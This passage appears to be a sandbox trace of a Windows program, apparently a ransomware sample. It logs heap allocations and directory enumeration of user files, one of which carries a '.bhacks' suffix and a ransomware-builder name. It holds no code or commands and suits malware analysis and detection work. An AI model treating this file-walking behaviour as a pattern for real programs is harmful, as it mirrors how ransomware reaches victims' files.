(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d898 [0083.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0083.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1560 | out: hHeap=0x2af0000) returned 1 [0083.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1758 | out: hHeap=0x2af0000) returned 1 [0083.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722e8 | out: hHeap=0x2af0000) returned 1 [0083.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6d098 | out: hHeap=0x2af0000) returned 1 [0083.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0083.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1548 | out: hHeap=0x2af0000) returned 1 [0083.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1728 [0083.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0083.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0083.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0083.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0083.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0083.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0083.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1560 [0083.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0083.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f15d8 [0083.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0083.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15d8 | out: hHeap=0x2af0000) returned 1 [0083.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1560 | out: hHeap=0x2af0000) returned 1 [0083.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0083.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0083.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0083.880] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0083.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72088 [0083.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1740 [0083.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0083.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0083.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1758 [0083.880] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0083.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6dd70 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1758 | out: hHeap=0x2af0000) returned 1 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6dd70 | out: hHeap=0x2af0000) returned 1 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1740 | out: hHeap=0x2af0000) returned 1 [0083.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0083.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1548 [0083.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0083.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1560 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1560 | out: hHeap=0x2af0000) returned 1 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1548 | out: hHeap=0x2af0000) returned 1 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0083.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0083.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1740 [0083.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72308 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72308 | out: hHeap=0x2af0000) returned 1 [0083.881] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4105fa60, ftCreationTime.dwHighDateTime=0x1d5cc92, ftLastAccessTime.dwLowDateTime=0x3135af40, ftLastAccessTime.dwHighDateTime=0x1d5c931, ftLastWriteTime.dwLowDateTime=0x3135af40, ftLastWriteTime.dwHighDateTime=0x1d5c931, nFileSizeHigh=0x0, nFileSizeLow=0x8f23, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="7jATM.wav", cAlternateFileName="")) returned 1 [0083.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1758 [0083.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6dd70 [0083.881] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722c8 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1740 | out: hHeap=0x2af0000) returned 1 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6d898 | out: hHeap=0x2af0000) returned 1 [0083.881] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0083.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1728 | out: hHeap=0x2af0000) returned 1 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f15d8 [0083.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1758 | out: hHeap=0x2af0000) returned 1 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0083.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1548 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1728 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0083.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1728 | out: hHeap=0x2af0000) returned 1 [0083.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1548 | out: hHeap=0x2af0000) returned 1 [0083.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0083.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0083.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0083.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1728 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1548 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722b8 [0083.882] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d898 [0083.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1548 | out: hHeap=0x2af0000) returned 1 [0083.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0083.882] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6d898 | out: hHeap=0x2af0000) returned 1 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1728 | out: hHeap=0x2af0000) returned 1 [0083.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0083.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1788 [0083.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1560 [0083.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0083.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1728 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1728 | out: hHeap=0x2af0000) returned 1 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1560 | out: hHeap=0x2af0000) returned 1 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1788 | out: hHeap=0x2af0000) returned 1 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0083.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0083.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1740 [0083.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0083.883] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81d84fe0, ftCreationTime.dwHighDateTime=0x1d5ca4c, ftLastAccessTime.dwLowDateTime=0x349b2b0, ftLastAccessTime.dwHighDateTime=0x1d5d1f2, ftLastWriteTime.dwLowDateTime=0x349b2b0, ftLastWriteTime.dwHighDateTime=0x1d5d1f2, nFileSizeHigh=0x0, nFileSizeLow=0xcdc4, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="9gEE-.bmp", cAlternateFileName="")) returned 1 [0083.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1728 [0083.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6d898 [0083.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1740 | out: hHeap=0x2af0000) returned 1 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6dd70 | out: hHeap=0x2af0000) returned 1 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15d8 | out: hHeap=0x2af0000) returned 1 [0083.883] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1548 [0083.883] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1728 | out: hHeap=0x2af0000) returned 1 [0083.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0083.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0083.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0083.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0083.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0083.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0083.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1728 [0083.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0083.884] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f15d8 [0083.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0083.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15d8 | out: hHeap=0x2af0000) returned 1 [0083.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1728 | out: hHeap=0x2af0000) returned 1 [0083.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0083.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0083.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0083.884] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0083.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0083.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1560 [0083.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0083.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0083.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f15d8 [0083.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0083.885] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a6dd70 [0083.885] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15d8 | out: hHeap=0x2af0000) returned 1 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6dd70 | out: hHeap=0x2af0000) returned 1 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1560 | out: hHeap=0x2af0000) returned 1 [0083.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0083.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1788 [0083.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0083.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1728 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1728 | out: hHeap=0x2af0000) returned 1 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1788 | out: hHeap=0x2af0000) returned 1 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0083.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0083.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f15d8 [0083.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1560 [0083.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72378 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0083.886] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2584d4ec, ftCreationTime.dwHighDateTime=0x1d5dff9, ftLastAccessTime.dwLowDateTime=0x2584d4ec, ftLastAccessTime.dwHighDateTime=0x1d5dff9, ftLastWriteTime.dwLowDateTime=0x25c9f900, ftLastWriteTime.dwHighDateTime=0x1d5dff9, nFileSizeHigh=0x0, nFileSizeLow=0xf0b30, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="alien ransomware builder cracked free.exe.bhacks", cAlternateFileName="ALIENR~1.BHA")) returned 1 [0083.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0083.886] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1560 | out: hHeap=0x2af0000) returned 1 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f15d8 | out: hHeap=0x2af0000) returned 1 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a6d898 | out: hHeap=0x2af0000) returned 1 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0083.886] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1548 | out: hHeap=0x2af0000) returned 1 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1728 [0083.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0083.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7180 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1788 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72308 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1740 [0083.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72308 | out: hHeap=0x2af0000) returned 1 [0083.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1740 | out: hHeap=0x2af0000) returned 1 [0083.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1788 | out: hHeap=0x2af0000) returned 1 [0083.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0083.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0083.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0083.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f1548 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29f16b0 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0083.887] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a73530 [0083.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f16b0 | out: hHeap=0x2af0000) returned 1 [0083.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0083.887] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0083.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0083.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0083.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73530 | out: hHeap=0x2af0000) returned 1 [0083.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0083.888] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f1548 | out: hHeap=0x2af0000) returned 1 [0083.888] FindNextFileW (in: hFindFile=0x98f7c8, lpFindFileData=0x8cf210 | out: lpFindFileData=0x8cf210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd2336d40, ftCreationTime.dwHighDateTime=0x1d5d3d8, ftLastAccessTime.dwLowDateTime=0xb1ce5320, ftLastAccessTime.dwHighDateTime=0x1d5d3e8, ftLastWriteTime.dwLowDateTime=0xb1ce5320, ftLastWriteTime.dwHighDateTime=0x1d5d3e8, nFileSizeHigh=0x0, nFileSizeLow=0xd39f, dwReserved0=0x1207d0, dwReserved1=0x0, cFileName="BlDya8Gp-4HPz6uNsS.xls", cAlternateFileName="BLDYA8~1.XLS")) returned 1 [0083.888] FindNextFileW (in: 